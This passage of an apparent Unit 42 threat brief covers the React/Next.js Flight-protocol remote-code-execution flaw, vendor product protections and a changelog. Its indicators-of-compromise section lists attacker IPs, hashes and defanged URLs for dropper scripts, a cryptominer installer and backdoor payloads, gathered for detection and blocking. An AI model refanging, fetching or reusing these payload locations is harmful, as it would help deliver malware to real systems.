The critical distinction of this vulnerability is its nature as a deterministic logic flaw in the Flight protocol, rather than a probabilistic error. Unlike memory corruption bugs that may fail, this flaw guarantees execution, transforming it into a reliable system-wide bypass for attackers. Amplified by the massive footprint of Next.js in enterprise environments, this creates a direct conduit to sensitive internal data.

Ultimately, this incident underscores the inherent friction between performance and security in modern architecture. While React Server Components optimize data fetching and search engine optimization (SEO) by moving logic closer to the source, they simultaneously move the attack surface closer to organizations’ most sensitive and valuable data.

Palo Alto Networks customers are better protected by our products, as listed below. We will update this threat brief as more relevant information becomes available.

Palo Alto Networks Product Protections for CVE-2025-55182

Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

• North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
• UK: +44.20.3743.3660
• Europe and Middle East: +31.20.299.3130
• Asia: +65.6983.8730
• Japan: +81.50.1790.0200
• Australia: +61.2.4062.7950
• India: 000 800 050 45107
• South Korea: +82.080.467.8774

Next-Generation Firewalls With Advanced Threat Prevention

Next-Generation Firewall with the Advanced Threat Prevention security subscription can help block the attacks via the following Threat Prevention signatures: 96779, 96780, and 96787.

Cloud-Delivered Security Services for the Next-Generation Firewall

Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.

Cortex XDR and XSIAM

Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.

Cortex has released a response pack and playbook for CVE-2025-55182 (React) and CVE-2025-66478 (Next.js) to help automate and speed the mitigation process.

This playbook automates the following tasks:

• Collecting indicators from the Unit 42 article
• Detecting any suspicious command lines indicative of exploitation of these vulnerabilities via an XQL query
• Investigating the command lines to identify malicious indicators related to the vulnerabilities
• Hunting for malicious indicators via an XQL query
• Isolating compromised React and Next.js servers (requires analyst approval)
• Blocking malicious indicators
• Providing mitigation recommendations

Cortex Xpanse

Cortex Xpanse is designed to identify exposed devices and applications on the public internet and escalate these findings to defenders. Customers can enable alerting on assets that are potentially at risk by ensuring that the Vercel Next.js Attack Surface Rule is enabled.

Additionally, Xpanse has published an Attack Surface test for CVE-2025-55182. This validates the vulnerability via an RCE direct check by attempting to execute a benign command payload compatible with both Linux and Windows systems.

Notably, these React and Next.js applications do not publicly expose software version details, meaning these detections are not a strong indicator of a vulnerable application. These detections are also available for Cortex XSIAM customers who have purchased the ASM module.

Cortex Cloud

Cortex Cloud provides comprehensive ASPM capabilities to rapidly identify the reach of CVE-2025-55182 and CVE-2025-66478 across your application landscape. Through real-time SBOM visibility, security teams can instantly query their software inventory to pinpoint specific instances of vulnerable React (versions 19.0–19.2) and Next.js (versions 15.x–16.x) packages. The platform’s Operational Risk model further aids in prioritization by evaluating component health and flagged risks. Crucially, teams can enforce prevention-first guardrails to automatically block builds that contain these critical vulnerabilities. This ensures that no application relying on the unsanctioned or unpatched Flight protocol implementation can ever be deployed, effectively stopping the RCE vector from entering your environment.

Prisma Cloud

Prisma Cloud detects the presence of these critical vulnerabilities within your codebase, registries, and runtime environments. The platform’s vulnerability scanner specifically identifies the use of the affected react-server and next packages associated with CVE-2025-55182 and CVE-2025-66478. Beyond detection, you can configure enforcement rules to actively block builds and deployments if these high-severity findings are detected. By surfacing these risks and enforcing a fail-threshold for critical CVEs, Prisma Cloud enables teams to prevent the release of applications running susceptible versions, ensuring that only the hardened, patched frameworks reach production.

Indicators of Compromise

• 140[.]99[.]223[.]178 
• 156[.]234[.]209[.]103
• 38[.]162[.]112[.]141
• 45[.]32[.]158[.]54
• 46[.]36[.]37[.]85
• 47[.]84[.]79[.]46
• 95[.]169[.]180[.]135
• 45.134.174[.]235/2.sh
• 45.134.174[.]235/solra
• hxxp://46[.]36[.]37[.]85:12000/sex[.]sh
• hxxp://115[.]42[.]60[.]223:61236/slt
• hxxp://45[.]32[.]158[.]54/5e51aff54626ef7f/x86_64
• hxxp://115[.]42[.]60[.]223:61236/slt
• hxxp://156[.]234[.]209[.]103:20912/get[.]sh
• hxxp://156[.]234[.]209[.]103:20913/get[.]sh
• hxxp://45[.]32[.]158[.]54/5e51aff54626ef7f/x86_64
• hxxp://46[.]36[.]37[.]85:12000/sex[.]sh
• hxxp://95[.]169[.]180[.]135:8443/pamssod
• hxxp://res[.]qiqigece[.]top/nginx1
• hxxps://raw[.]githubusercontent[.]com/C3Pool/xmrig_setup/master/setup_c3pool_miner[.]sh
• hxxps://sup001[.]oss-cn-hongkong[.]aliyuncs[.]com/123/python1[.]sh
• reactcdn[.]windowserrorapis[.]com
• res[.]qiqigece[.]top
• ebdb85704b2e7ced3673b12c6f3687bc0177a7b1b3caef110213cc93a75da837
• f88ce150345787dd1bcfbc301350033404e32273c9a140f22da80810e3a3f6ea
• fc9e53675e315edeea2292069c3fbc91337c972c936ca0f535da01760814b125

BPFDoor

• 140.99.223[.]178/32736 
• 1f3f0695c7ec63723b2b8e9d50b1838df304821fcb22c7902db1f8248a812035 

EtherRAT

• hxxp://193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 

Noodle RAT

• 192.238.202[.]17 
• tcp://vip[.]kof97.lol:443 
• hxxp://146.88.129[.]138:5511/443nb64 
• 33641bfbbdd5a9cd2320c61f65fe446a2226d8a48e3bd3c29e8f916f0592575f 

SNOWLIGHT

• 115[.]42[.]60[.]223 
• a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4 
• 1663d98c259001f1b03f82d0c5bee7cfd3c7623ccb83759c994f9ab845939665 
• 18c68a982f91f665effe769f663c51cb0567ea2bfc7fab6a1a40d4fe50fc382b 
• 1a3e7b4ee2b2858dbac2d73dd1c52b1ea1d69c6ebb24cc434d1e15e43325b74e 
• 1cdd9b0434eb5b06173c7516f99a832dc4614ac10dda171c8eed3272a5e63d20 
• 1e31dc074a4ea7f400cb969ea80e8855b5e7486660aab415da17591bc284ac5b 
• 2b0dc27f035ba1417990a21dafb361e083e4ed94a75a1c49dc45690ecf463de4 
• 2ca913556efd6c45109fd8358edb18d22a10fb6a36c1ab7b2df7594cd5b0adbc 
• 4ff096fbea443778fec6f960bf2b9c84da121e6d63e189aebaaa6397d9aac948 
• 55ae00bc8482afd085fd128965b108cca4adb5a3a8a0ee2957d76f33edd5a864 
• 62e9a01307bcf85cdaeecafd6efb5be72a622c43a10f06d6d6d3b566b072228d 
• 7d25a97be42b357adcc6d7f56ab01111378a3190134aa788b1f04336eb924b53 
• 7f05bad031d22c2bb4352bf0b6b9ee2ca064a4c0e11a317e6fedc694de37737a 
• 9c931f7f7d511108263b0a75f7b9fcbbf9fd67ebcc7cd2e5dcd1266b75053624 
• ac2182dfbf56d58b4d63cde3ad6e7a52fed54e52959e4c82d6fc999f20f8d693 
• ac7027f30514d0c00d9e8b379b5ad8150c9827c827dc7ee54d906fc2585b6bf6 
• b38ec4c803a2d84277d9c598bfa5434fb8561ddad0ec38da6f9b8ece8104d787 
• bc31561c44a36e1305692d0af673bc5406f4a5bb2c3f2ffdb613c09b4e80fa9f 
• bf602b11d99e815e26c88a3a47eb63997d43db8b8c60db06d6fbddf386fd8c4a 
• d704541cde64a3eef5c4f80d0d7f96dc96bae8083804c930111024b274557b16 
• d9313f949af339ed9fafb12374600e66b870961eeb9b2b0d4a3172fd1aa34ed0 
• e2d7c8491436411474cef5d3b51116ddecfee68bab1e15081752a54772559879 

VShell

• 4a759cbc219bcb3a1f8380a959307b39873fb36a9afd0d57ba0736ad7a02763b 

Additional Resources

Updated Dec. 8th, 2025, at 3:45 p.m. PT to add significant updates. These include a Post-Exploitation Activity section and product coverage. New activity covers: scanning and reconnaissance, cloud credential theft, malicious dropper scripts, cryptomining, deployment of backdoor Noodle RAT, execution of SNOWLIGHT and VShell and Chinese-linked activity. 

Updated Dec. 9th, 2025, at 2:00 p.m. PT to add significant updates. These include additional details in the Post-Exploitation Activity section. New subsections include information on: Activity that shares overlaps with DPRK tooling using EtherRAT; BPFDoor, a Linux backdoor; and a new Auto-color variant (a Linux backdoor). Updated the Indicators of Compromise section. Added a new Threat Prevention signature.

Updated Dec. 10th, 2025, at 1:30 p.m. PT to add subsection on React2Shell exploit attempts in the Post-Exploitation Activity section. Added Cortex XDR playbook coverage and information. 

​​Updated Dec. 11th, 2025, at 1:30 p.m. PT to add script to subsection on React2Shell exploit attempts in the Post-Exploitation Activity section. Amended Cortex Xpanse language.

​​Updated Dec. 12th, 2025, at 1:40 p.m. PT to change language surrounding CL-STA-1015 attribution, and update BPFDoor name to KSwapDoor with additional details.